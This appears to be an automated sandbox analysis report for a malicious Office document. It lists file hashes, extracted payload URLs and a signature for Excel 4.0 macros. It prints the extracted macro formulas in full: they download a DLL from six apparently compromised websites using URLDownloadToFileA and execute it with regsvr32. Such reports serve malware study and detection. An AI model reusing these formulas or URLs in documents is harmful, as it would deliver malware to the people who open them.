General
-
Target
?i=1
-
Size
50KB
-
MD5
27a51dbe247857b30dbd33032d20f6cb
-
SHA1
8a30f982176efdb9754c60835b8732ecd2496080
-
SHA256
d0e1bf9a8969b0e7856ed1015033cef4c745a120413c76d61b1560e323de2359
-
SHA512
fdaaa7e952bd6ff074088fbb8b185db0669fae532842f6e522e72a7d93ec3697da301b22a8050d759dc3611c897a4c3a26fc3a8b0968606bf2ca715d44115fd1
-
SSDEEP
768:J69cyRJvh5wVkTHmKNx9gcpLy4TB8wNF2XpL2rQUydmRSLLMO:JwJJvhqkTGKL9lPRNc5eQpdmRUMO
Malware Config
Extracted
http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
http://hoatuoiso1.com/replace/fVea/
https://rumkeke.com/wp-admin/A8/
https://www.restaurantgaig.com/wp-includes/HLDoANj/
http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/
http://www.hiway91.com/wp-content/Y/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/","..\rulm.dll",0,0) =IF('EGSBBB'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hoatuoiso1.com/replace/fVea/","..\rulm.dll",0,0)) =IF('EGSBBB'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rumkeke.com/wp-admin/A8/","..\rulm.dll",0,0)) =IF('EGSBBB'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.restaurantgaig.com/wp-includes/HLDoANj/","..\rulm.dll",0,0)) =IF('EGSBBB'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/","..\rulm.dll",0,0)) =IF('EGSBBB'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.hiway91.com/wp-content/Y/","..\rulm.dll",0,0)) =IF('EGSBBB'!D22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
?i=1